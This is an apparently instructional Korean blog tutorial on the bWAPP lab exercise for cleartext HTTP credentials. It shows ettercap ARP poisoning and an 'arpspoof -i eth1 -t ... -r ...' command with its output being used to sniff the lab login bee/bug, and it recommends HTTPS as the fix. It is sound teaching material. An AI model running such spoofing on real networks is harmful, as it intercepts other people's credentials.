정보보안(구버전)/ bWAPP 2019. 2. 21. 14:00

웹 해킹 bWAPP - 82. A6 - Sensitive Data Exposure - Clear Text HTTP(Credentials)

 

 

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다. 

 

 

1. Sensitive Data Exposure

 
 - OWASP Top10 A6 - 민감한 데이터 노출
 - 서버와 클라이언트 간에 평문으로 데이터 전송시 스니핑(MITM) 공격에 의해서 정보가 유출될 수 있다.
 - 그렇기 때문에 SSL(HTTPs) 보안 통신 연결을 이용하여 암호화/인증을 통하여 데이터를 보호해야 한다.
 - 또한, 데이터 처리와 암호화 저장이 클라이언트에서 진행되면 공격자가 클라이언트 제어권을 획득하여 정보가 유출될

   수 있으니, 서버에서 진행하는 것을 권장한다.

 

 

 

2. Clear Text HTTP(Credentials)

 

 - HTTP는 평문으로 데이터를 전송하기 때문에 스니핑에 의해서 정보가 유출될 수 있다.

 - 그렇기 때문에 SSL(HTTPs)를 사용하여 보안 통신 연결 이후, 중요한 정보는 암호화/인증을 실시하여 전송해야 한다.

 

 

 

3. Sensitive Data Exposure - Clear Text HTTP(Credentials)

 

 - 이  시나리오는 HTTP 메세지가 평문으로 전송되는 취약점을 확인하는 내용이다.

 

 

  

Ex1) Sensitive Data Exposure - Clear Text HTTP(Credentials) 이해

 

 - 로컬 PC 브라우저를 이용하여 bWAPP 접속 실시

 

 

보안 레벨 선택 및 시나리오 선택

 

 

 

HTTP 로그인 폼 출력

 

 

 

'ettercap' 실행

root@kali:~# ettercap -G &
[1] 14777


root@kali:~#
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team


 

 


Sniff -> Unified sniffing -> eth1 선택 -> 확인

 

 

 

Hosts -> Scan for hosts

 

 

 

Hosts -> Host list

 

 

 

192.168.20.205(bWAPP) -> Add to Target 1   &   192.168.20.1(로컬 PC) -> Add to Target2

 

 

 

Mitm -> ARP Poisoning -> 'Sniff remote connections' 체크 -> 확인

 

 

 

Start -> start sniffing

 

 

 

로컬 PC 브라우저에서 로그인 실시(bee/bug)

 

 

 

로그인 성공

 

 

 

ettercap 스니핑 결과 확인

 

 

 

 

Ex2) 'insuff_transp_layer_protect_1.php' 파일 내용 확인

 

bee@bee-box:/var/www/bWAPP$ ls -l insuff_transp_layer_protect_1.php
-rw-rw-r-- 1 root www-data 5824 2014-11-02 23:52 insuff_transp_layer_protect_1.php

bee@bee-box:/var/www/bWAPP$ vi insuff_transp_layer_protect_1.php

~ 중간 생략 ~

 

switch($_COOKIE["security_level"])
{

 

    case "0" :

 

        $url = $_SERVER["SCRIPT_NAME"];
        break;

 

    case "1" :

 

        $message = "A certificate must be configured to fully function!";
        $url = "https://" . $_SERVER["HTTP_HOST"] . $_SERVER["SCRIPT_NAME"];
        break;

 

    case "2" :

 

        $message = "A certificate must be configured to fully function!";
        $url = "https://" . $_SERVER["HTTP_HOST"] . $_SERVER["SCRIPT_NAME"];
        break;

 

    default :

 

        $url = $_SERVER["SCRIPT_NAME"];
        break;

 

}

 

:q! 

 

 

 

 

Ex3) 보안 레벨 'High' 변경

 

 

보안 레벨 및 시나리오 선택

 

 

 

와이어샤크 실행

root@kali:~# wireshark &
[1] 15592 


 

 

ARP 스푸핑 실시

root@kali:~# arpspoof -i eth1 -t 192.168.20.205 -r 192.168.20.1


0:c:29:54:f2:fb 0:c:29:5b:24:81 0806 42: arp reply 192.168.20.1 is-at 0:c:29:54:f2:fb
0:c:29:54:f2:fb 0:50:56:c0:0:1 0806 42: arp reply 192.168.20.205 is-at 0:c:29:54:f2:fb
0:c:29:54:f2:fb 0:c:29:5b:24:81 0806 42: arp reply 192.168.20.1 is-at 0:c:29:54:f2:fb
0:c:29:54:f2:fb 0:50:56:c0:0:1 0806 42: arp reply 192.168.20.205 is-at 0:c:29:54:f2:fb
0:c:29:54:f2:fb 0:c:29:5b:24:81 0806 42: arp reply 192.168.20.1 is-at 0:c:29:54:f2:fb
0:c:29:54:f2:fb 0:50:56:c0:0:1 0806 42: arp reply 192.168.20.205 is-at 0:c:29:54:f2:fb
~ 중간 생략 ~

 

 

 

 

로컬 PC 브라우저에서 로그인 실시(bee/bug)

 

 

 

로그인 성공

 

 

 

와이어샤크 캡처 내용 확인

 

 

 

ARP 스푸핑 중지

0:c:29:54:f2:fb 0:c:29:5b:24:81 0806 42: arp reply 192.168.20.1 is-at 0:c:29:54:f2:fb
0:c:29:54:f2:fb 0:50:56:c0:0:1 0806 42: arp reply 192.168.20.205 is-at 0:c:29:54:f2:fb
(Ctrl+C)

 

root@kali:~#

 

 

[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)

 

웹해킹 82. A6 - bWAPP Sensitive Data Exposure - Clear Text HTTP(Credentials)   https://youtu.be/xAhdr_LF8Uk

Posted by 김정우 강사(카카오톡 : kim10322)
,


Q